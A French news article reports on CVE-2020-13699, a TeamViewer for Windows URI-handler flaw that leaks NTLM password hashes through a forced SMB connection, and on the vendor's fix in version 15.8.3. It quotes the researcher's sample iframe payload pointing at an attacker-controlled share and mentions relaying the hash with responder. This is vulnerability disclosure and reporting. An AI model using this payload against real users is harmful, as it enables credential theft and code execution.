Une faille dans TeamViewer peut permettre aux hackers de voler le mot de passe du système

TeamViewer a récemment corrigé une vulnérabilité à haut risque dans son application de bureau pour Windows en publiant une nouvelle version de son logiciel, qui, si elle est exploitée, pourrait permettre à des attaquants distants de voler votre mot de passe système et potentiellement de l’exploiter.

Ce qui est encore plus inquiétant, c’est que cette attaque ne nécessite pas l’interaction de la victime et peut être effectuée presque automatiquement.

Pour ceux qui ne le savent pas, TeamViewer est une application logicielle populaire développée par la société allemande TeamViewer GmbH, pour le contrôle à distance, le partage de bureau, les réunions en ligne, la webconférence et le transfert de fichiers entre ordinateurs.

Elle est disponible pour les systèmes d’exploitation Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 et BlackBerry. Il est également possible d’accéder à un système exécutant TeamViewer avec un navigateur web.

La vulnérabilité sévère surnommée CVE-2020-13699 a été découverte pour la première fois par Jeffrey Hofmann, un chercheur en sécurité de Praetorian. Selon le chercheur, la vulnérabilité réside dans TeamViewer pour Windows dans la manière dont l’application cite son URI personnalisé (gestionnaire URI non cité).

L’expert a découvert que le problème pourrait permettre à un attaquant de forcer le logiciel à relayer une demande d’authentification NTLM vers le système de l’attaquant. En d’autres termes, un attaquant peut forcer le schéma URI de TeamViewer depuis une page web pour tromper l’application installée sur le système de la victime afin d’initier une connexion vers le partage SMB distant appartenant à l’attaquant.

Cela déclenche le processus d’authentification SMB, qui à son tour, va divulguer le nom d’utilisateur du système et la version hachée NTLMv2 du mot de passe aux attaquants.

Pour exploiter avec succès CVE 2020-13699, l’attaquant doit intégrer un iframe malveillant sur un site web et ensuite tromper les victimes pour qu’elles visitent cette URL malicieusement conçue. Une fois que les victimes cliquent sur le lien, TeamViewer lancera automatiquement son client de bureau Windows et ouvrira un partage SMB distant.

« Un attaquant pourrait intégrer un iframe malveillant dans un site web avec une URL conçue (iframe src=’teamviewer10: –play \attacker-IPake.tvs’) qui lancerait le client de bureau Windows de TeamViewer et le forcerait à ouvrir un partage SMB distant », a expliqué Jeffrey Hofmann dans un avis.

« Windows effectuera une authentification NTLM lors de l’ouverture du partage SMB et cette demande peut être relayée (en utilisant un outil comme responder) pour l’exécution de code (ou capturée pour le craquage de hachage). »

Cette vulnérabilité affecte « les gestionnaires URI teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 et tvvpn1 », a déclaré Hofmann.

Suite à la divulgation de la vulnérabilité, le projet TeamViewer a corrigé la faille en citant les paramètres passés par les gestionnaires URI affectés, par exemple, URL:teamviewer10 Protocole “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”.

Pour corriger la faille, « Nous avons mis en œuvre des améliorations dans la gestion des URI relatives à CVE 2020-13699 », a déclaré TeamViewer dans un communiqué. « Merci, Jeffrey Hofmann de Praetorian, pour votre professionnalisme et pour avoir suivi un modèle de divulgation responsable. Nous sommes reconnaissants que vous nous ayez contactés et que vous ayez pu confirmer la correction de vos découvertes dans la dernière version. »

Pour résoudre le problème, TeamViewer a publié la version 15.8.3 et recommande à ses utilisateurs de mettre à jour immédiatement vers cette version.

Lire aussi - Meilleures alternatives à Teamviewer